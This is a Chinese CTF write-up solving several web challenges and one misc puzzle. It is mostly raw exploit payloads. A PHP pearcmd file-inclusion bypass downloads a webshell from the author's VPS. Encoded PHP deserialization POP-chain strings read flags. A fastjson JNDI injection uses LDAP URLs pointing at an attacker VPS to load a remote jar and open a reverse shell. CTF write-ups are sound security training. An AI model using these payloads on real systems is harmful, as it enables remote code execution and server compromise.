WEB

rce_me

 <?php(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];function fliter($var): bool{     $blacklist = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];         foreach($blacklist as $blackword){           if(stristr($var, $blackword)) return False;    }    return True;}  if(fliter($_SERVER["QUERY_STRING"])){include $file;}else{die("Noooo0");} 

pearcmd.php文件包含，过滤了常用的几个命令选项，但还有个download。写个马丢到vps上，pear的过滤使用url编码绕过。

/?+download+http://vps:7999/asd.php+&file=/usr/local/lib/php/%70%65%61%72%63%6d%64.php

date -f /flag

step_by_step-v3

本来想着bypass 那个正则的 结果发现flag在phpinfo里面

$a = new cheng();$b = new bei();$c = new yang();$d = new cheng();$e = new yang();$d->c1 = $e;$c->y1 = $d;$b->b1 = $c;$a->c1 = $b;echo (serialize($a));

ans=O%3A5%3A%22cheng%22%3A1%3A%7Bs%3A2%3A%22c1%22%3BO%3A3%3A%22bei%22%3A2%3A%7Bs%3A2%3A%22b1%22%3BO%3A4%3A%22yang%22%3A1%3A%7Bs%3A2%3A%22y1%22%3BO%3A5%3A%22cheng%22%3A1%3A%7Bs%3A2%3A%22c1%22%3BO%3A4%3A%22yang%22%3A1%3A%7Bs%3A2%3A%22y1%22%3BN%3B%7D%7D%7Ds%3A2%3A%22b2%22%3BN%3B%7D%7D

" />
 
 
读phpinfo的链子，就上面文件包含前一段
 
$a=new cheng();$b=new bei();$c=new yang();$c->y1="phpinfo";$a->c1=$b;$b->b1=$c;echo serialize($a);
Safepop
去年浙江省大学生省赛原题
Pop链思路为class B -> class A::__get -> class Fun::__call -> class Test::getFlag
 
Exp:
 
Payload：
 
/?pop=%4f%3a%31%3a%22%42%22%3a%32%3a%7b%73%3a%31%3a%22%70%22%3b%73%3a%31%3a%22%63%22%3b%73%3a%31%3a%22%61%22%3b%4f%3a%31%3a%22%41%22%3a%31%3a%7b%73%3a%31%3a%22%61%22%3b%4f%3a%33%3a%22%46%75%6e%22%3a%32%3a%7b%73%3a%39%3a%22%00%46%75%6e%00%66%75%6e%63%22%3b%61%3a%32%3a%7b%69%3a%30%3b%4f%3a%34%3a%22%54%65%73%74%22%3a%30%3a%7b%7d%69%3a%31%3b%73%3a%37%3a%22%67%65%74%46%6c%61%67%22%3b%7d%7d%7d%7d
simple_json（复现）
jar包解压反编译看到test那有个测试用例，就是jndi注入了。是用的fastjson去实例化题目自己写的JNDIService类触发。
自己用org.apache.naming.factory.BeanFactory 类打没打成功，没搞明白为啥。使用JNDIInject-1.2-SNAPSHOT.jar这个工具去打高版本利用，用fuzz模块去看看可用的利用链。
{"content": {"@type": "ycb.simple_json.service.JNDIService","target": "ldap://vps:7999/fuzzbyDNS/w8wlk1.dnslog.cn"},"msg": {"$ref": "$.content.context"}}
用工具给的对应payload源码修改一下命令 生成jar包 然后反弹shell即可
ldap://ip:7999/snakeyaml/http://ip:7777/yaml-payload.jar
MISC
签到
rot13+base32